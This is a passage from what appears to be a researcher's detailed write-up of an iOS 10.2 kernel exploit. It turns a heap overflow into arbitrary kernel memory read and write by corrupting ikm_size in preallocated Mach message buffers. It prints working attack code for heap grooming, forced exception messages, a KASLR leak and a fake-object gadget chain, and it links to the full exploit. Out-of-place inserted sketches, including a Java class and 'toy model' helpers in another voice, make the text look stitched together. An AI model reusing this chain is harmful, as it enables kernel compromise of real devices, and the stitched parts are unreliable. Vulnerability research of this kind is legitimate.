 mach_msg_priority_t        ikm_qos_override;
 struct ipc_importance_elem *ikm_importance;
 queue_chain_t              ikm_inheritance;
};

This is a structure which has a size field that can be corrupted without needing to know any pointer values. How is the ikm_size field used?

Looking for cross references to ikm_size in the code we can see it’s only used in a handful of places:

void ipc_kmsg_free(ipc_kmsg_t kmsg);

This function uses kmsg->ikm_size to free the kmsg back to the correct kalloc zone. The zone allocator will detect frees to the wrong zone and panic so we’ll have to be careful that we don’t free a corrupted ipc_kmsg without first fixing up the size.

This macro is used to set the ikm_size field:

#define ikm_init(kmsg, size)  \
MACRO_BEGIN                   \
(kmsg)->ikm_size = (size);   \

This macro uses the ikm_size field to set the ikm_header pointer:

#define ikm_set_header(kmsg, mtsize)                       \
MACRO_BEGIN                                                \
(kmsg)->ikm_header = (mach_msg_header_t *)                 \
((vm_offset_t)((kmsg) + 1) + (kmsg)->ikm_size - (mtsize)); \
MACRO_END

That macro is using the ikm_size field to set the ikm_header field such that the message is aligned to the end of the buffer; this could be interesting.
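The effect of ikm_set_header can be checked with plain offset arithmetic. In this Java sketch, KmsgLayout is a hypothetical name and kmsgStructSize is a parameter standing in for sizeof(struct ipc_kmsg), since `(kmsg) + 1` in C advances by one whole struct; no real struct size is assumed.

```java
class KmsgLayout {
    // Offset of ikm_header from the start of the kmsg allocation, following ikm_set_header:
    //   (kmsg + 1) + ikm_size - mtsize
    static long headerOffset(long kmsgStructSize, long ikmSize, long mtsize) {
        return kmsgStructSize + ikmSize - mtsize;
    }

    // Offset one past the last message byte, i.e. where the kernel believes the buffer ends.
    static long messageEnd(long kmsgStructSize, long ikmSize, long mtsize) {
        return headerOffset(kmsgStructSize, ikmSize, mtsize) + mtsize;
    }
}
```

The message always ends at struct size + ikm_size, whatever mtsize is, so any increase in ikm_size shifts the header, and the whole message, later by exactly that amount.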

Finally there’s a check in ipc_kmsg_get_from_kernel:

 if (msg_and_trailer_size > kmsg->ikm_size - max_desc) {
   ip_unlock(dest_port);
   return MACH_SEND_TOO_LARGE;
 }

That’s using the ikm_size field to ensure that there’s enough space in the ipc_kmsg buffer for a message.

It looks like if we corrupt the ikm_size field we’ll be able to make the kernel believe that a message buffer is bigger than it really is which will almost certainly lead to message contents being written out of bounds. But haven’t we just turned a kernel heap overflow into… another kernel heap overflow? The difference this time is that a corrupted ipc_kmsg might also let me read memory out of bounds. This is why corrupting the ikm_size field could be an interesting thing to investigate.

It’s about sending a message
ipc_kmsg structures are used to hold in-transit mach messages. When userspace sends a mach message we end up in ipc_kmsg_alloc. If the message is small (less than IKM_SAVED_MSG_SIZE) then the code will first look in a cpu-local cache for recently freed ipc_kmsg structures. If none are found it will allocate a new cacheable message from the dedicated ipc.kmsg zalloc zone.

Larger messages bypass this cache and are directly allocated by kalloc, the general purpose kernel heap allocator. After allocating the buffer, the structure is immediately initialized using the two macros we saw:

 kmsg = (ipc_kmsg_t)kalloc(ikm_plus_overhead(max_expanded_size));
…  
 if (kmsg != IKM_NULL) {
   ikm_init(kmsg, max_expanded_size);
   ikm_set_header(kmsg, msg_and_trailer_size);
 }

 return(kmsg);

Unless we’re able to corrupt the ikm_size field in between those two macros, the most we’d be able to do is cause the message to be freed to the wrong zone and immediately panic. Not so useful.

But ikm_set_header is called in one other place: ipc_kmsg_get_from_kernel.

This function is only used when the kernel sends a real mach message; it’s not used for sending replies to kernel MIG apis for example. The function’s comment explains more:

* Routine: ipc_kmsg_get_from_kernel
* Purpose:
* First checks for a preallocated message
* reserved for kernel clients.  If not found –
* allocates a new kernel message buffer.
* Copies a kernel message to the message buffer.

Using the mach_port_allocate_full method from userspace we can allocate a new mach port which has a single preallocated ipc_kmsg buffer of a controlled size. The intended use-case is to allow userspace to receive critical messages without the kernel having to make a heap allocation. Each time the kernel sends a real mach message, it first checks whether the port has one of these preallocated buffers and whether that buffer is already in use. We then reach the following code (I’ve removed the locking and 32-bit only code for brevity):

 if (IP_VALID(dest_port) && IP_PREALLOC(dest_port)) {
   mach_msg_size_t max_desc = 0;
   
   kmsg = dest_port->ip_premsg;
   if (ikm_prealloc_inuse(kmsg)) {
     ip_unlock(dest_port);
     return MACH_SEND_NO_BUFFER;
   }

   if (msg_and_trailer_size > kmsg->ikm_size - max_desc) {
     ip_unlock(dest_port);
     return MACH_SEND_TOO_LARGE;
   }
   ikm_prealloc_set_inuse(kmsg, dest_port);
   ikm_set_header(kmsg, msg_and_trailer_size);
   ip_unlock(dest_port);
…  
 (void) memcpy((void *) kmsg->ikm_header, (const void *) msg, size);

This code checks whether the message would fit (trusting kmsg->ikm_size), marks the preallocated buffer as in-use, calls the ikm_set_header macro, which sets ikm_header such that the message will be aligned to the end of the buffer, and finally calls memcpy to copy the message into the ipc_kmsg.

This means that if we can corrupt the ikm_size field of a preallocated ipc_kmsg and make it appear larger than it is, then when the kernel sends a message it will write the message contents off the end of the preallocated message buffer.
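To make the effect of a corrupted ikm_size concrete, here is a small userland toy model (our own illustration, not kernel code). Two adjacent 64-byte chunks stand in for the preallocated ipc_kmsg and whatever object follows it, and toy_send repeats the ikm_set_header arithmetic (message placed at buffer start + ikm_size - size) before copying. The layout, chunk size and all names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Toy model only, NOT XNU's real layout: two adjacent 64-byte "heap chunks".
 * Chunk 0 plays the preallocated kmsg (a 4-byte ikm_size field followed by
 * its message buffer); chunk 1 is whatever object sits after it. */
#define CHUNK    64
#define SIZE_FLD 4
static uint8_t toy_heap[2 * CHUNK];

static void toy_set_ikm_size(uint32_t size) {
    memcpy(toy_heap, &size, sizeof size);
}

/* Mirrors ikm_set_header + memcpy in ipc_kmsg_get_from_kernel: the message is
 * placed at (buffer start + ikm_size - mtsize), so it always ends where
 * ikm_size *claims* the buffer ends. Returns the heap offset the message was
 * copied to, or -1 where the kernel would return MACH_SEND_TOO_LARGE. */
static long toy_send(const uint8_t *msg, uint32_t mtsize) {
    uint32_t ikm_size;
    memcpy(&ikm_size, toy_heap, sizeof ikm_size);
    if (mtsize > ikm_size)
        return -1;
    long header = SIZE_FLD + (long)ikm_size - (long)mtsize;
    /* Keeps the toy inside its own array; the real kernel has no such check. */
    assert(header + (long)mtsize <= (long)sizeof toy_heap);
    memcpy(toy_heap + header, msg, mtsize);
    return header;
}
```

With an honest ikm_size of 60, a 16-byte message is copied to offset 48 and ends exactly at the chunk boundary; adding 32 to ikm_size moves the same copy to offset 80, entirely inside the neighbouring chunk, while the size check still passes.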

ikm_header is also used in the mach message receive path, so when we dequeue the message it will also read out of bounds. If we could replace whatever was originally after the message buffer with data we want to read we could then read it back as part of the contents of the message.

This new primitive we’re building is more powerful in another way: if we get this right we’ll be able to read and write out of bounds in a repeatable, controlled way without having to trigger a bug each time.

Exceptional behaviour
There’s one difficulty with preallocated messages: because they’re only used when the kernel sends a message to us, we can’t just send a message with controlled data and get it to use the preallocated ipc_kmsg. Instead we need to persuade the kernel to send us a message with data we control, and this is much harder!

There are only a handful of places where the kernel actually sends userspace a mach message. There are various types of notification messages like IODataQueue data-available notifications, IOServiceUserNotifications and no-senders notifications. These usually only contain a small amount of user-controlled data. The only message types sent by the kernel which seem to contain a decent amount of user-controlled data are exception messages.

When a thread faults (for example by accessing unallocated memory or calling a software breakpoint instruction) the kernel will send an exception message to the thread’s registered exception handler port.

If a thread doesn’t have an exception handler port, the kernel will try to send the message to the task’s exception handler port, and if that also fails, the exception message will be delivered to the global host exception port. A thread can normally set its own exception port, but setting the host exception port is a privileged action.

routine thread_set_exception_ports(
        thread         : thread_act_t;
        exception_mask : exception_mask_t;
        new_port       : mach_port_t;
        behavior       : exception_behavior_t;
        new_flavor     : thread_state_flavor_t);

This is the MIG definition for thread_set_exception_ports. new_port should be a send right to the new exception port. exception_mask lets us restrict the types of exceptions we want to handle. behavior defines what type of exception message we want to receive, and new_flavor lets us specify what kind of thread state we want to be included in the message.

Passing an exception_mask of EXC_MASK_ALL, EXCEPTION_STATE for behavior and ARM_THREAD_STATE64 for new_flavor means that the kernel will send an exception_raise_state message to the exception port we specify whenever the specified thread faults. That message will contain the state of all the ARM64 general-purpose registers, and that’s what we’ll use to get controlled data written off the end of the ipc_kmsg buffer!

Some assembly required…
In our iOS Xcode project we can add a new assembly file and define a function load_regs_and_crash:

.text
.globl  _load_regs_and_crash
.align  2
_load_regs_and_crash:
mov x30, x0
ldp x0, x1, [x30, 0]
ldp x2, x3, [x30, 0x10]
ldp x4, x5, [x30, 0x20]
ldp x6, x7, [x30, 0x30]
ldp x8, x9, [x30, 0x40]
ldp x10, x11, [x30, 0x50]
ldp x12, x13, [x30, 0x60]
ldp x14, x15, [x30, 0x70]
ldp x16, x17, [x30, 0x80]
ldp x18, x19, [x30, 0x90]
ldp x20, x21, [x30, 0xa0]
ldp x22, x23, [x30, 0xb0]
ldp x24, x25, [x30, 0xc0]
ldp x26, x27, [x30, 0xd0]
ldp x28, x29, [x30, 0xe0]
brk 0
.align  3

This function takes a pointer to a 240-byte buffer as its first argument and loads the first 30 ARM64 general-purpose registers (x0 to x29) from that buffer. When it then triggers a software breakpoint via brk 0, the kernel sends an exception message which contains the bytes from the input buffer in the same order.
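The useful property of the stub is that the 240 bytes come out in the message in the same order they went in. A minimal C sketch of preparing that buffer, assuming the register part of ARM_THREAD_STATE64 is laid out as x0 to x28 followed by fp (x29), which is how we understand Apple's arm_thread_state64_t; the mirror struct and the pack_regs helper are hypothetical names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define NREGS            30           /* x0..x29, loaded by load_regs_and_crash */
#define CONTROLLED_BYTES (NREGS * 8)  /* 240 */

/* Our assumed mirror of arm_thread_state64_t: x0..x28, fp (x29), lr, sp, pc,
 * cpsr. Only used to check that x0..x29 form one contiguous 240-byte run. */
struct toy_arm_state64 {
    uint64_t x[29];
    uint64_t fp, lr, sp, pc;
    uint32_t cpsr, pad;
};
_Static_assert(offsetof(struct toy_arm_state64, fp) == 29 * 8,
               "fp (x29) directly follows x28");
_Static_assert(offsetof(struct toy_arm_state64, lr) == CONTROLLED_BYTES,
               "x0..x29 span exactly 240 bytes");

/* Hypothetical helper: copy up to 240 controlled bytes into the array passed
 * to load_regs_and_crash, zero-filling the rest. Returns how many bytes will
 * actually appear in the exception message. */
static size_t pack_regs(uint64_t regs[NREGS], const void *data, size_t len) {
    assert(regs != NULL);
    if (len > CONTROLLED_BYTES)
        len = CONTROLLED_BYTES;       /* x30 holds the buffer pointer itself */
    memset(regs, 0, CONTROLLED_BYTES);
    if (len > 0)
        memcpy(regs, data, len);
    return len;
}
```

The compile-time checks fail if the assumed layout is wrong, and pack_regs makes the 240-byte limit explicit: anything past the 30th register cannot be controlled this way.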

We’ve now got a way to get controlled data in a message which will be sent to a preallocated port, but what value should we overwrite ikm_size with to get the controlled portion of the message to overlap with the start of the following heap object? It’s possible to determine this statically, but it would be much easier if we could just use a kernel debugger and take a look at what happens. However, iOS only runs on very locked-down hardware with no supported way to do kernel debugging.

I’m going to build my own kernel debugger (with printfs and hexdumps)
A proper debugger has two main features: breakpoints and memory peek/poke. Implementing breakpoints is a lot of work but we can still build a meaningful kernel debugging environment just using kernel memory access.

There’s a bootstrapping problem here: we need a kernel exploit which gives us kernel memory access in order to develop our kernel exploit to give us kernel memory access! In December I published the mach_portal iOS kernel exploit, which gives you kernel memory read/write, and as part of that I wrote a handful of kernel introspection functions which allowed you to find process task structures and look up mach port objects by name. We can build one more level on that and dump the kobject pointer of a mach port.

The first version of this new exploit was developed inside the mach_portal Xcode project so I could reuse all the code. After everything was working, I ported it from iOS 10.1.1 to iOS 10.2.

Inside mach_portal I was able to find the address of a preallocated port buffer like this:

 // allocate an ipc_kmsg:
 kern_return_t err;
 mach_port_qos_t qos = {0};
 qos.prealloc = 1;
 qos.len = size;
 
 mach_port_name_t name = MACH_PORT_NULL;
 
 err = mach_port_allocate_full(mach_task_self(),
                               MACH_PORT_RIGHT_RECEIVE,
                               MACH_PORT_NULL,
                               &qos,
                               &name);

 uint64_t port = get_port(name);
 uint64_t prealloc_buf = rk64(port+0x88);
 printf("0x%016llx,\n", prealloc_buf);

get_port was part of the mach_portal exploit and is defined like this:

uint64_t get_port(mach_port_name_t port_name){
 return proc_port_name_to_port_ptr(our_proc, port_name);
}

uint64_t proc_port_name_to_port_ptr(uint64_t proc, mach_port_name_t port_name) {
 uint64_t ports = get_proc_ipc_table(proc);
 uint32_t port_index = port_name >> 8;
 uint64_t port = rk64(ports + (0x18*port_index)); //ie_object
 return port;
}

uint64_t get_proc_ipc_table(uint64_t proc) {
 uint64_t task_t = rk64(proc + struct_proc_task_offset);
 uint64_t itk_space = rk64(task_t + struct_task_itk_space_offset);
 uint64_t is_table = rk64(itk_space + struct_ipc_space_is_table_offset);
 return is_table;
}

These code snippets are using the rk64() function provided by the mach_portal exploit which reads kernel memory via the kernel task port.
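The lookup in proc_port_name_to_port_ptr relies on how mach port names are built: the upper 24 bits index the task's is_table and the low 8 bits hold a generation number. A small sketch of just that arithmetic, using the 0x18-byte ipc_entry size from the code above (which is specific to the iOS build being targeted); the helper names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Entry size taken from proc_port_name_to_port_ptr above; build-specific. */
#define IPC_ENTRY_SIZE 0x18

/* A port name = (index into is_table << 8) | 8-bit generation number. */
static uint32_t port_name_index(uint32_t name) { return name >> 8; }
static uint32_t port_name_gen(uint32_t name) { return name & 0xff; }

/* Kernel address of the ipc_entry for name; its first field (ie_object) is
 * what rk64() reads to obtain the ipc_port pointer. */
static uint64_t ipc_entry_addr(uint64_t is_table, uint32_t name) {
    assert(is_table != 0);
    return is_table + (uint64_t)IPC_ENTRY_SIZE * port_name_index(name);
}
```

For example, a name of 0x1103 refers to entry 0x11 (generation 3), which lives 0x198 bytes into the table.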

I used this method with some trial and error to determine the correct value to overwrite ikm_size to be able to align the controlled portion of an exception message with the start of the next heap object.

get-where-what
The final piece of the puzzle is the ability to know where controlled data is; rather than write-what-where, we want to get where what is.

One way to achieve this in the context of a local privilege escalation exploit is to place this kind of data in userspace, but hardware mitigations like SMAP on x86 and the AMCC hardware on iPhone 7 make this harder. Therefore we’ll construct a new primitive to find out where our ipc_kmsg buffer is in kernel memory.

One aspect I haven’t touched on until now is how to get the ipc_kmsg allocation next to the buffer we’ll overflow out of. Stefan Esser has covered the evolution of the zalloc heap over the last few years in a series of conference talks; the latest talk has details of the zone freelist randomization.

Whilst experimenting with the heap behaviour using the introspection techniques described above, I noticed that some size classes would actually still give you close to linear allocation behaviour (later allocations are contiguous). It turns out this is due to the lower-level allocator which zalloc gets pages from: by exhausting a particular zone we can force zalloc to fetch new pages, and if our allocation size is close to the page size we’ll just get that page back immediately.

This means we can use code like this:

 int prealloc_size = 0x900; // kalloc.4096
 
 for (int i = 0; i < 2000; i++){
   prealloc_port(prealloc_size);
 }
 
 // these will be contiguous now, convenient!
 mach_port_t holder = prealloc_port(prealloc_size);
 mach_port_t first_port = prealloc_port(prealloc_size);
 mach_port_t second_port = prealloc_port(prealloc_size);
 
to get a heap layout in which the preallocated buffers of holder, first_port and second_port sit next to each other in memory.

This is not completely reliable; for devices with more RAM you’ll need to increase the iteration count for the zone exhaustion loop. It’s not a perfect technique, but it works well enough for a research tool.

We can now free the holder port, trigger the overflow (which will reuse the slot where holder was and overflow into first_port), then grab the slot again with another holder port:

 // free the holder:
 mach_port_destroy(mach_task_self(), holder);

 // reallocate the holder and overflow out of it
 uint64_t overflow_bytes[] = {0x1104,0,0,0,0,0,0,0};
 do_overflow(0x1000, 64, overflow_bytes);
 
 // grab the holder again
 holder = prealloc_port(prealloc_size);

The overflow has changed the ikm_size field of the preallocated ipc_kmsg belonging to first_port to 0x1104.

After the ipc_kmsg structure has been filled in by ipc_kmsg_get_from_kernel, it will be enqueued into the target port’s queue of pending messages by ipc_kmsg_enqueue:

void ipc_kmsg_enqueue(ipc_kmsg_queue_t queue,
                     ipc_kmsg_t       kmsg)
{
 ipc_kmsg_t first = queue->ikmq_base;
 ipc_kmsg_t last;

 if (first == IKM_NULL) {
   queue->ikmq_base = kmsg;
   kmsg->ikm_next = kmsg;
   kmsg->ikm_prev = kmsg;
 } else {
   last = first->ikm_prev;
   kmsg->ikm_next = first;
   kmsg->ikm_prev = last;
   first->ikm_prev = kmsg;
   last->ikm_next = kmsg;
 }
}

If the port has pending messages, the ikm_next and ikm_prev fields of the ipc_kmsg form a doubly-linked list of pending messages. But if the port has no pending messages, then ikm_next and ikm_prev are both set to point back to kmsg itself. The following interleaving of message sends and receives will allow us to use this fact to read back the address of the second ipc_kmsg buffer:

 uint64_t valid_header[] = {0xc40, 0, 0, 0, 0, 0, 0, 0};
 send_prealloc_msg(first_port, valid_header, 8);
 
 // send a message to the second port
 // writing a pointer to itself in the prealloc buffer
 send_prealloc_msg(second_port, valid_header, 8);
 
 // receive on the first port, reading the header of the second:
 uint64_t* buf = receive_prealloc_msg(first_port);
 
 // this is the address of second port
 kernel_buffer_base = buf[1];

Here’s the implementation of send_prealloc_msg:

void send_prealloc_msg(mach_port_t port, uint64_t* buf, int n) {
 struct thread_args* args = malloc(sizeof(struct thread_args));
 memset(args, 0, sizeof(struct thread_args));
 memcpy(args->buf, buf, n*8);
 
 args->exception_port = port;
 
 // start a new thread passing it the buffer and the exception port
 pthread_t t;
 pthread_create(&t, NULL, do_thread, (void*)args);
 
 // associate the pthread_t with the port
 // so that we can join the correct pthread
 // when we receive the exception message and it exits:
 kern_return_t err = mach_port_set_context(mach_task_self(),
                                           port,
                                           (mach_port_context_t)t);

 // wait until the message has actually been sent:
 while(!port_has_message(port)){;}
}

Remember that to get the controlled data into the port’s preallocated ipc_kmsg we need the kernel to send the exception message to it, so send_prealloc_msg actually has to cause that exception. It allocates a struct thread_args, which contains a copy of the controlled data we want in the message and the target port, then starts a new thread which will call do_thread:

void* do_thread(void* arg) {
 struct thread_args* args = (struct thread_args*)arg;
 uint64_t buf[32];
 memcpy(buf, args->buf, sizeof(buf));
 
 kern_return_t err;
 err = thread_set_exception_ports(mach_thread_self(),
                                  EXC_MASK_ALL,
                                  args->exception_port,
                                  EXCEPTION_STATE,
                                  ARM_THREAD_STATE64);
 free(args);
 
 load_regs_and_crash(buf);
 return NULL;
}

do_thread copies the controlled data from the thread_args structure to a local buffer, then sets the target port as this thread’s exception handler. It frees the arguments structure, then calls load_regs_and_crash, the assembler stub that copies the buffer into the first 30 ARM64 general-purpose registers and triggers a software breakpoint.

At this point the kernel’s interrupt handler will call exception_deliver, which will look up the thread’s exception port and call the MIG mach_exception_raise_state method. That method serializes the crashing thread’s register state into a MIG message and calls mach_msg_rpc_from_kernel_body, which grabs the exception port’s preallocated ipc_kmsg, trusts the ikm_size field and uses it to align the sent message to what it believes to be the end of the buffer.

In order to actually read data back we need to receive the exception message. In this case we got the kernel to send a message to the first port which had the effect of writing a valid header over the second port. Why use a memory corruption primitive to overwrite the next message’s header with the same data it already contains?

Note that if we just send the message and immediately receive it we’ll read back what we wrote. In order to read back something interesting we have to change what’s there. We can do that by sending a message to the second port after we’ve sent the message to the first port but before we’ve received it.

We observed before that if a port’s message queue is empty when a message is enqueued, the ikm_next field will point back to the message itself. So by sending a message to second_port (overwriting its header with one that keeps the ipc_kmsg valid and unused), then reading back the message sent to first_port, we can determine the address of the second port’s ipc_kmsg buffer.
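A userland toy model of why this leaks an address: it reuses the ipc_kmsg_enqueue logic quoted earlier on a stripped-down struct, and leak_word1 plays the role of the out-of-bounds read that returns the neighbouring kmsg's first two words. We assume, as the buf[1] read above implies, that ikm_next is the second pointer-sized word; the struct and helper names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Toy ipc_kmsg: ikm_size, then the queue links (assumed layout). */
struct toy_kmsg {
    uint32_t ikm_size;
    struct toy_kmsg *ikm_next;
    struct toy_kmsg *ikm_prev;
};
struct toy_queue { struct toy_kmsg *ikmq_base; };

/* Same logic as ipc_kmsg_enqueue quoted above. */
static void toy_enqueue(struct toy_queue *queue, struct toy_kmsg *kmsg) {
    struct toy_kmsg *first = queue->ikmq_base;
    if (first == NULL) {
        queue->ikmq_base = kmsg;
        kmsg->ikm_next = kmsg;   /* empty queue: the kmsg points at itself */
        kmsg->ikm_prev = kmsg;
    } else {
        struct toy_kmsg *last = first->ikm_prev;
        kmsg->ikm_next = first;
        kmsg->ikm_prev = last;
        first->ikm_prev = kmsg;
        last->ikm_next = kmsg;
    }
}

/* Models the out-of-bounds read: copy the first two words of the adjacent
 * kmsg (what comes back as buf[0] and buf[1]) and return buf[1]. */
static uintptr_t leak_word1(const struct toy_kmsg *neighbour) {
    uintptr_t words[2];
    memcpy(words, neighbour, sizeof words);
    return words[1];
}
```

With exactly one message queued, the leaked word equals the kmsg's own address; once a second message is queued, ikm_next points at the other message instead, which is why the order of the sends matters.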

read/write to arbitrary read/write
We’ve turned our single heap overflow into the ability to reliably overwrite and read back the contents of a 240 byte region after the first_port ipc_kmsg object as often as we want. We also know where that region is in the kernel’s virtual address space. The final step is to turn that into the ability to read and write arbitrary kernel memory.

For the mach_portal exploit I went straight for the kernel task port object. This time I chose to take a different path and build on a neat trick I saw in the Pegasus exploit detailed in the Lookout writeup.

Whoever developed that exploit had found that the IOKit OSSerializer::serialize method is a very neat gadget that lets you turn the ability to call a function with one argument that points to controlled data into the ability to call another controlled function with two completely controlled arguments.

In order to use this we need to be able to call a controlled address passing a pointer to controlled data. We also need to know the address of OSSerializer::serialize.

Let’s free second_port and reallocate an IOKit userclient there:

 // send another message on first
 // writing a valid, safe header back over second
 send_prealloc_msg(first_port, valid_header, 8);
 
 // free second and get it reallocated as a userclient:
 mach_port_deallocate(mach_task_self(), second_port);
 mach_port_destroy(mach_task_self(), second_port);
 
 mach_port_t uc = alloc_userclient();
 
 // read back the start of the userclient buffer:
 buf = receive_prealloc_msg(first_port);

 // save a copy of the original object:
 memcpy(legit_object, buf, sizeof(legit_object));
 
 // this is the vtable for AGXCommandQueue
 uint64_t vtable = buf[0];

alloc_userclient allocates user client type 5 of the AGXAccelerator IOService which is an AGXCommandQueue object. IOKit’s default operator new uses kalloc and AGXCommandQueue is 0xdb8 bytes so it will also use the kalloc.4096 zone and reuse the memory just freed by the second_port ipc_kmsg.

Note that we sent another message with a valid header to first_port, which overwrote second_port’s header with a valid header. This is so that after second_port is freed and the memory reused for the user client, we can dequeue the message from first_port and read back the first 240 bytes of the AGXCommandQueue object. The first qword is a pointer to the AGXCommandQueue’s vtable; using this we can determine the KASLR slide and thus work out the address of OSSerializer::serialize.
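The slide arithmetic itself is simple. A sketch, assuming you have the unslid value of the AGXCommandQueue vtable pointer and the unslid address of OSSerializer::serialize from a kernelcache of exactly the same build; the helper name is hypothetical and no real addresses are implied.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helper. leaked_vtable is the first qword read back from the
 * AGXCommandQueue object; unslid_vtable and unslid_serialize must come from
 * the kernelcache of exactly the same build. */
static uint64_t slid_serialize_addr(uint64_t leaked_vtable,
                                    uint64_t unslid_vtable,
                                    uint64_t unslid_serialize) {
    assert(leaked_vtable >= unslid_vtable); /* the slide is never negative */
    uint64_t slide = leaked_vtable - unslid_vtable;
    return unslid_serialize + slide;
}
```

Every other kernel address the exploit needs later (uuid_copy, for instance) is shifted by the same slide.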

Calling any IOKit MIG method on the AGXCommandQueue userclient will likely result in at least three virtual calls: ::retain() will be called by iokit_lookup_connect_port, which is called by the MIG intran for the userclient port. This method also calls ::getMetaClass(). Finally the MIG wrapper will call iokit_remove_connect_reference, which will call ::release().

Since these are all C++ virtual methods, they will pass the this pointer as the first (implicit) argument, meaning that we should be able to fulfil the requirement for using the OSSerializer::serialize gadget. Let’s look more closely at exactly how that works:

class OSSerializer : public OSObject
{
 OSDeclareDefaultStructors(OSSerializer)

 void * target;
 void * ref;
 OSSerializerCallback callback;

 virtual bool serialize(OSSerialize * serializer) const;
};

bool OSSerializer::serialize( OSSerialize * s ) const
{
 return( (*callback)(target, ref, s) );
}

It’s clearer what’s going on if we look at the disassembly of OSSerializer::serialize:

; OSSerializer::serialize(OSSerializer *__hidden this, OSSerialize *)

MOV  X8, X1
LDP  X1, X3, [X0,#0x18] ; load X1 from [X0+0x18] and X3 from [X0+0x20]
LDR  X9, [X0,#0x10]     ; load X9 from [X0+0x10]
MOV  X0, X9
MOV  X2, X8
BR   X3                 ; call [X0+0x20] with X0=[X0+0x10] and X1=[X0+0x18]

Since we have read/write access to the first 240 bytes of the AGXCommandQueue userclient and we know where it is in memory, we can replace it with a fake object which will turn a virtual call to ::release into a call to an arbitrary function pointer with two controlled arguments.

We’ve redirected the vtable pointer to point back to this object so we can interleave the vtable entries we need along with the data. We now just need one more primitive on top of this to turn an arbitrary function call with two controlled arguments into an arbitrary memory read/write.
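A sketch of how such a fake object could be laid out, reconstructed from the disassembly above rather than taken from the exploit itself. serialize loads the callback's first argument from +0x10, the second from +0x18 and the branch target from +0x20, and the vtable pointer at +0 points back at the object so that vtable slots are read from the object itself. The vtable index of ::release is build-specific and not given here, so release_slot is a hypothetical parameter; the entries for the other virtual calls (::retain, ::getMetaClass) also need sensible values and are left to the caller.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define FAKE_QWORDS 30             /* 240 bytes we can read and write */

/* Offsets read by OSSerializer::serialize, from the disassembly above. */
#define SLOT_TARGET   (0x10 / 8)   /* callback's first argument  */
#define SLOT_REF      (0x18 / 8)   /* callback's second argument */
#define SLOT_CALLBACK (0x20 / 8)   /* function that gets called  */

/* Hypothetical builder. Patches only the slots this technique needs into obj,
 * leaving whatever else the caller prepared untouched. obj_addr is the
 * object's kernel address, release_slot the (build-specific) vtable index of
 * ::release. Returns -1 if that slot would clash with the vtable pointer
 * (slot 0), the assumed retain count (slot 1) or the gadget data (2-4). */
static int build_fake_object(uint64_t obj[FAKE_QWORDS], uint64_t obj_addr,
                             int release_slot, uint64_t serialize_addr,
                             uint64_t fn, uint64_t arg0, uint64_t arg1) {
    assert(obj != NULL);
    if (release_slot <= SLOT_CALLBACK || release_slot >= FAKE_QWORDS)
        return -1;
    obj[0] = obj_addr;                  /* vtable pointer -> this object */
    obj[SLOT_TARGET] = arg0;
    obj[SLOT_REF] = arg1;
    obj[SLOT_CALLBACK] = fn;
    obj[release_slot] = serialize_addr; /* "vtable" entry for ::release */
    return 0;
}
```

A virtual call to ::release then loads obj[release_slot] through the self-pointing vtable, lands in OSSerializer::serialize with X0 = the object, and ends up calling fn(arg0, arg1).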

Functions like copyin and copyout are the obvious candidates as they will handle any complexities involved in copying across the user/kernel boundary, but they both take three arguments (source, destination and size) and we can only completely control two.

However, since we already have the ability to read and write this fake object from userspace, we can actually just copy values to and from this kernel buffer rather than having to copy to and from userspace directly. This means we can expand our search to any memory copying functions like memcpy. Of course memcpy, memmove and bcopy all also take three arguments, so what we need is a wrapper around one of those which passes a fixed size.

Looking through the cross-references to those functions we find uuid_copy:

; uuid_copy(uuid_t dst, const uuid_t src)
MOV  W2, #0x10 ; size
B    _memmove

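This function is just a simple wrapper around memmove which always passes a fixed size of 16 bytes. Let’s integrate that final primitive into the serializer gadget: with uuid_copy as the callback, target becomes the destination and ref the source of a 16-byte copy.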

Swapping the order of the two arguments switches between a write and a read: to read, we copy from an arbitrary address into our fake userclient object, then receive the exception message to read back the data.
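To see that the chain really gives a 16-byte copy in either direction, here is a userland model of it, entirely our own and touching no kernel. toy_serialize has the same shape as OSSerializer::serialize, toy_uuid_copy stands in for uuid_copy (memmove with a fixed size of 16), and toy_read/toy_write only differ in argument order. A plain staging array stands in for the part of the fake object we read and write through exception messages. All names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Userland model only; nothing here touches the kernel. */
typedef int (*toy_callback)(void *target, void *ref, void *s);

/* Field order mirrors OSSerializer; offsets shown are for a 64-bit build. */
struct toy_serializer {
    const void *vtable;     /* +0x00 */
    int32_t retain_count;   /* +0x08 */
    void *target;           /* +0x10 -> first callback argument (X0) */
    void *ref;              /* +0x18 -> second callback argument (X1) */
    toy_callback callback;  /* +0x20 -> branch target (X3) */
};

/* Same shape as OSSerializer::serialize: callback(target, ref, s). */
static int toy_serialize(const struct toy_serializer *self, void *s) {
    assert(self->callback != NULL);
    return self->callback(self->target, self->ref, s);
}

/* Stand-in for uuid_copy(dst, src): a memmove with a fixed 16-byte size.
 * The real uuid_copy returns void; int keeps the callback type uniform. */
static int toy_uuid_copy(void *dst, void *src, void *unused) {
    (void)unused;
    memmove(dst, src, 16);
    return 1;
}

/* Read: dst = staging buffer, src = arbitrary address, 16 bytes per call;
 * the staging buffer is then "received" into out. Whole 16-byte chunks of
 * the source are read, so it must be readable up to the next 16 bytes. */
static void toy_read(struct toy_serializer *obj, uint8_t staging[16],
                     const uint8_t *addr, uint8_t *out, size_t len) {
    for (size_t off = 0; off < len; off += 16) {
        obj->target = staging;
        obj->ref = (void *)(addr + off);
        toy_serialize(obj, NULL);
        size_t n = len - off < 16 ? len - off : 16;
        memcpy(out + off, staging, n);
    }
}

/* Write: the same call with the arguments swapped, i.e. dst = arbitrary
 * address, src = staging buffer we filled beforehand. */
static void toy_write(struct toy_serializer *obj, uint8_t staging[16],
                      uint8_t *addr, const uint8_t data[16]) {
    memcpy(staging, data, 16);
    obj->target = addr;
    obj->ref = staging;
    toy_serialize(obj, NULL);
}
```

Because every call copies exactly 16 bytes, longer reads are just repeated calls, and a read always touches whole 16-byte chunks of the source.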

You can download my exploit for iOS 10.2 on iPod 6G here: http://ift.tt/2oRV7NF

This bug was also independently discovered and exploited by Marco Grassi and qwertyoruiopz, check out their code to see a different approach to exploiting this bug which also uses mach ports.

Critical code should be criticised
